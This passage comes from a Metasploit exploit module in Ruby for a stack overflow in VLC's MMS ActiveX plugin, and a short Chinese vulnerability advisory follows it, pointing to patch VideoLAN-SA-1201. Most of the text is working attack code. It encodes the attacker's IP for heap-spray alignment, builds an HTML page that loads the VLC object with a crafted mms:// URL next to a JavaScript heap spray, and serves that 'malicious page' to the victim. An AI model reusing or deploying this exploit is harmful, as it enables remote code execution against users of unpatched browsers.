src_ip = Rex::Socket.source_address.split('.')
hex_ip = src_ip.map { |h| [h.to_i].pack('C*')[0].unpack('H*')[0] }.join
# Try to maximize success on IE7 platform:
# If first octet of IP address is minor than 16 pad with zero
# even when heap spray could be not successful.
# Else pad following target heap spray criteria.
if ((hex_ip.to_i(16) >> 24) < 16)
padding_char = '0'
else
padding_char = my_target['Padding']
end
hex_ip = "0x#{padding_char * my_target['Offset']}#{hex_ip}"
html = <<-EOS
<html>
<head>
<script>
#{js_spray}
</script>
</head>
<body>
<OBJECT classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
events="True">
<param value="mms://#{hex_ip}:#{datastore['SRVPORT']}" />
<param value="True" />
<param value="False" />
<param value="True" />
<EMBED pluginspage="http://www.videolan.org"
type="application/x-vlc-plugin" progid="VideoLAN.VLCPlugin.2"
autoplay="yes"
loop="no"
target="mms://#{hex_ip}:#{datastore['SRVPORT']}"
>
</EMBED>
</OBJECT>
</body>
</html>
EOS
#Remove extra tabs in HTML
html = html.gsub(/^\t\t/, "")
print_status("Sending malicious page")
send_response( cli, html, {'Content-Type' => 'text/html'} )
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
VideoLAN
--------
VideoLAN已经针对该漏洞发布了安全公告(VideoLAN-SA-1201)以及相应补丁,受影响的用户应尽快安装:
VideoLAN-SA-1201:Stack overflow in VLC MMS support
链接: